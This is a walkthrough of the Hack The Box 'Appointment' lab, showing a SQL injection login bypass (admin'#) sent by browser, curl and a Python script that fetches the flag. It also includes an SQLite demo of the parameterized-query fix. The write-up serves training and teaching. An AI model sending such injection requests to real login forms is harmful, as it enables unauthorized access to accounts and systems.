Shashank Mishra
Harder HTB: Using only the terminal

Attempting Tier 1: Appointment

This is the first challenge in Tier 1, right after you finish the Tier 0 challenges. It comes with a walkthrough that shows how to perform a SQL injection. The lesson is a nice step up from the previous challenges, and a fun one to solve.

To complete the challenge, essentially you open the webpage in your browser and enter the injection credentials, which are as follows -

```text
username - admin'#
password - anystring
```

The way this injection works: the single quote after admin closes the string literal in the query, and the # that follows starts a line comment (MySQL/MariaDB syntax), so everything after it, including the AND password='...' check, is ignored by the database. A beautiful walkthrough is available on HTB; check it out for more details.
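To see the query mechanics end to end, here is an added example (my own code, not from the post or the HTB walkthrough). It mirrors the PHP string concatenation exactly, runs it against a constructed in-memory SQLite database with one admin row, and shows the parameterized form that defeats the injection. One caveat it also demonstrates: SQLite does not accept # as a comment marker (that is MySQL/MariaDB syntax), so the SQLite run uses the portable `-- ` variant of the same trick; the query text for admin'# is still shown so you can compare.

```python
import sqlite3


def build_query(username: str, password: str) -> str:
    """Mirror the PHP concatenation from the walkthrough character for character."""
    return f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"


def make_db() -> sqlite3.Connection:
    """Constructed sample database: one admin row with a password the attacker does not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cr3t-not-guessable')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Run the concatenated query; any returned row counts as a successful login."""
    return conn.execute(build_query(username, password)).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The fix: placeholders keep user input as data, so the quote and comment stay literal."""
    row = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?", (username, password)
    ).fetchone()
    return row is not None


def comment_marker_supported(conn: sqlite3.Connection, marker: str) -> bool:
    """Check whether this SQL dialect treats `marker` as the start of a line comment."""
    try:
        conn.execute(f"SELECT 1 {marker} trailing junk").fetchone()
        return True
    except sqlite3.OperationalError:
        return False


if __name__ == "__main__":
    db = make_db()
    # Exactly what the PHP builds for the credentials in the post.
    print(build_query("admin'#", "anystring"))
    # Same technique with the comment marker SQLite understands.
    print("vulnerable login with admin'-- :", login_vulnerable(db, "admin'-- ", "anystring"))
    print("parameterized login with admin'-- :", login_parameterized(db, "admin'-- ", "anystring"))
    print("SQLite accepts '#' comments:", comment_marker_supported(db, "#"))
```

The vulnerable path accepts the injected username with any password; the parameterized path rejects it because the database now looks for a user literally named admin'-- .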

Now, is it possible to perform this injection without using your browser, only using your terminal?

There are a range of reasons why you might want this. For example, your browser may not be going through the lab VPN or proxy correctly, so it cannot reach the target machine's IP (your browser is not on the same network as the target) and you cannot view the page at all. In that case you cannot get the flag required to complete the challenge. There is a simple workaround, though.

The excellently written walkthrough (massive props to @0ne-nine9 and @ilinor) gives us lots of valuable information. Studying the PHP code quoted in the walkthrough, we can see exactly how the authentication happens -

```php
$username = $_POST['username']; # User-specified username.
$password = $_POST['password']; # User-specified password.
$sql = "SELECT * FROM users WHERE username='$username' AND password='$password'";
# Query for user/pass retrieval from the DB.
```

A POST request is sent when you click the login button on the webpage, carrying two form fields: username and password. With this information we can build the same request with cURL and log in without a browser.

Alternatively, you can first make a GET request and fetch the page's HTML in your terminal. The form markup contains the details we need -

```html
<div class="wrap-input100 validate-input" data-validate = "Enter username">
<input class="input100" type="text" name="username" placeholder="Username">
<span class="focus-input100" data-placeholder="&#xf207;"></span></div>

<div class="wrap-input100 validate-input" data-validate="Enter password">
<input class="input100" type="password" name="password" placeholder="Password">
<span class="focus-input100" data-placeholder="&#xf191;"></span></div>
```

Here you can see the name attributes of the username and password inputs; those are the parameter names used when the form data is POSTed to the server.

Using this we can build the cURL request (this one was generated with Postman's code export, but it runs as-is in a terminal; replace ip_target_machine with the target's address) -

```bash
curl --location 'ip_target_machine' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'username=admin'\''#' \
--data-urlencode 'password=anythingyouwant'
```

Data is sent as application/x-www-form-urlencoded when an HTTP request carries only text parameters, which is also what the browser's login form sends (curl sets that Content-Type itself when you use --data-urlencode, so the explicit header is harmless but redundant). Note the shell quoting: 'admin'\''#' is how you get a literal single quote into a single-quoted bash argument, and --data-urlencode percent-encodes the quote and the # so they reach the server intact and PHP decodes them back into $_POST.

The password can be whatever you want, because the injection comments out the password check entirely.
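The same request in Python, as an added example (my own code, not from the post). It builds the form body exactly as curl --data-urlencode does, shows that decoding it the way PHP fills $_POST gives back admin'#, and pulls the flag out of the success banner. The post_login function sends the real request and needs the lab reachable; the URL is a command-line argument and is only an assumption about where the login form lives. The sample HTML used to check extract_flag is constructed here.

```python
import re
import sys
import urllib.parse
import urllib.request

# Injection credentials from the post; the password is arbitrary.
USERNAME = "admin'#"
PASSWORD = "anythingyouwant"


def encode_form(fields: dict) -> str:
    """Build the application/x-www-form-urlencoded body that curl --data-urlencode sends."""
    return urllib.parse.urlencode(fields)


def decode_post(body: str) -> dict:
    """Decode the body the way PHP populates $_POST (percent-decoding each value)."""
    return {k: v[0] for k, v in urllib.parse.parse_qs(body, keep_blank_values=True).items()}


def extract_flag(html: str):
    """Pull the flag out of the 'Your flag is:' banner; None if the login was rejected."""
    m = re.search(r"Your flag is:\s*([A-Za-z0-9_{}]+)", html)
    return m.group(1) if m else None


def post_login(url: str, username: str, password: str) -> str:
    """Send the same POST the curl command sends and return the response body."""
    body = encode_form({"username": username, "password": password}).encode()
    req = urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: python3 inject.py http://ip_target_machine/")  # URL is an assumption
        sys.exit(1)
    print("request body:", encode_form({"username": USERNAME, "password": PASSWORD}))
    html = post_login(sys.argv[1], USERNAME, PASSWORD)
    print(extract_flag(html) or "no flag in response; login was rejected")
```

The body it sends is username=admin%27%23&password=anythingyouwant, which is exactly what the curl command above produces; without the percent-encoding a raw # would still travel fine in a POST body, but the encoding removes any doubt about what the server receives.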

Run this in the terminal and the entire HTML page is printed, with the successful authentication message at the bottom -

```html
<div><h3>Congratulations!</h3><br><h4>Your flag is: flag0000000000000000</h4></div>
```

Congrats! You just got the flag without using a browser, or any GUI for that matter!
